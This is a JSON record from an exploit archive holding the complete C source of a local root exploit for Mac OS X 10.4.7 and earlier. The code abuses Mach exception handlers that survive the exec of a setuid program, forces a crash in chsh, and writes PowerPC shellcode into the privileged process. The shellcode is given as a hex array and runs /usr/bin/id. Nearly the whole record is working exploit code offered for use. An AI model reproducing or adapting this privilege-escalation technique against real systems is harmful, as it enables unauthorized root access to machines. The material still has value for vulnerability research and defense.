{"id": "1337DAY-ID-7581", "lastseen": "2018-02-07T03:32:32", "viewCount": 4, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2018-02-07T03:32:32", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-07T03:32:32", "rev": 2}, "vulnersScore": -0.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7581", "description": "Exploit for macOS platform in category local exploits", "title": "Mac OS X <= 10.4.7 Mach Exception Handling Local Root Exploit", "cvelist": [], "sourceData": "=============================================================\r\nMac OS X <= 10.4.7 Mach Exception Handling Local Root Exploit\r\n=============================================================\r\n\r\n\r\n/* excploit.c - 28 Nov 2005 - [email\u00a0protected]\r\n *\r\n * Exploitable Mach Exception Handling\r\n *\r\n * Affected: Mac OS X 10.4.6 (darwin 8.6.0) and older\r\n *\r\n * When a process executes a setuid executable, all existing rights to the\r\n * task port are invalidated, to make sure unauthorized processes do not\r\n * retain control of the process. Exception handlers however remain installed,\r\n * and when some kind of hardware exception occurs, the exception handler can\r\n * receive a new right to the task port as one of its arguments, and thus\r\n * regain full control over the process.\r\n *\r\n * Interestingly, the code to reset the exception handlers (and hence thwart\r\n * this attack) upon exec() of a setuid executable has been present in the\r\n * kernel since OSX 10.3, but is disabled (#if 0) for unspecified reasons.\r\n *\r\n * This exploit installs an exception handler on illegal memory access, forks\r\n * off a child (the handler is inherited), and uses RLIMIT_STACK to cause a\r\n * segfault after exec(). The shell code invokes /usr/bin/id.\r\n *\r\n * Greetings to Scrippie and #vuln\r\n *\r\n */\r\n\r\n#include <sys/resource.h>\r\n#include <sys/wait.h>\r\n#include <unistd.h>\r\n#include <mach/mach.h>\r\n\r\nextern boolean_t exc_server(mach_msg_header_t *, mach_msg_header_t *);\r\n\r\nint main(void) {\r\n\tmach_port_t self = mach_task_self(), exc;\r\n\tmach_port_allocate(self, MACH_PORT_RIGHT_RECEIVE, &exc);\r\n\tmach_port_insert_right(self, exc, exc, MACH_MSG_TYPE_MAKE_SEND);\r\n\ttask_set_exception_ports(self, EXC_MASK_BAD_ACCESS, exc,\r\n\t\t\tEXCEPTION_STATE_IDENTITY, PPC_THREAD_STATE);\r\n\r\n\tif (fork()) {\r\n\t\tmach_msg_server_once(exc_server, 512, exc, 0);\r\n\t\twait(NULL);\r\n\t} else {\r\n\t\tstatic struct rlimit rl;\r\n\t\tsetrlimit(RLIMIT_STACK, &rl);\r\n\t execl(\"/usr/bin/chsh\", \"chsh\", NULL);\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\nstatic long implant[] = {\r\n\t0x48000015, 0x00000000, 0x00100000, 0x00000000,\r\n\t0x00100000, 0x7ca802a6, 0x38600003, 0x38850000,\r\n\t0x380000c3, 0x44000002, 0x60000000, 0x38600000,\r\n\t0x38000017, 0x44000002, 0x60000000, 0x38600000,\r\n\t0x380000b5, 0x44000002, 0x60000000, 0x38650068,\r\n\t0x38850074, 0x90640000, 0x3800003b, 0x44000002,\r\n\t0x60000000, 0x38000001, 0x44000002, 0x2f757372,\r\n\t0x2f62696e, 0x2f696400, 0x00000000, 0x00000000,\r\n};\r\n\r\nkern_return_t catch_exception_raise_state_identity(mach_port_t exc, thread_t t,\r\n\t\ttask_t task, exception_type_t e, exception_data_t ed,\r\n\t\tmach_msg_type_number_t edsz, int *f, thread_state_t *is,\r\n\t\tmach_msg_type_number_t isz, thread_state_t *os) {\r\n\tvm_allocate(task, os, sizeof implant, TRUE);\r\n\tvm_write(task, *os, implant, sizeof implant);\r\n\treturn KERN_SUCCESS;\r\n}\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-07] #", "published": "2006-09-30T00:00:00", "references": [], "reporter": "xmath", "modified": "2006-09-30T00:00:00", "href": "https://0day.today/exploit/description/7581"}

{}